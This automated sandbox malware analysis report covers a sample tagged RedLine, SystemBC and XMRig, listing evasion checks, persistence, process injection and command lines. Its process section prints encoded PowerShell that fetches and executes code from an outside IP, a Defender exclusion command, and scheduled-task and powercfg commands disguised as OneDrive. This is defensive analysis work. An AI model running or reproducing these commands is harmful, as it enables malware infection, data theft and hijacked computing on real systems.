Malware Analysis Report

2025-04-03 09:43

Sample ID 230504-m6v8vadf7t
Target file
SHA256 d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
Tags
systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

systembc xmrig evasion miner persistence trojan redline [ pro ] infostealer spyware

xmrig

RedLine

SystemBC

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Identifies Wine through registry keys

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Delays execution with timeout.exe

Checks processor information in registry

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-04 11:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-04 11:05

Reported

2023-05-04 11:07

Platform

win7-20230220-en

Max time kernel

124s

Max time network

143s

Command Line

C:\Windows\Explorer.EXE

Signatures

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1676 set thread context of 1600 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1676 set thread context of 2000 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\lsass\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1704 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 888 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 888 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 888 wrote to memory of 1872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1980 wrote to memory of 1068 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1068 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1068 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1856 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1856 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1856 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1772 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1980 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 888 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 888 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 888 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 888 wrote to memory of 1496 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 932 wrote to memory of 1676 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 932 wrote to memory of 1676 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 932 wrote to memory of 1676 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 888 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 888 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 888 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 888 wrote to memory of 1220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1928 wrote to memory of 1936 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1936 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1936 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1928 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1996 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1996 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1996 wrote to memory of 1300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1676 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1220 wrote to memory of 528 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 528 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 528 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 528 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1220 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1220 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1220 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 1220 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {5A0F8D62-427A-4247-AB2F-707A9EFB5F4C} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:11 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

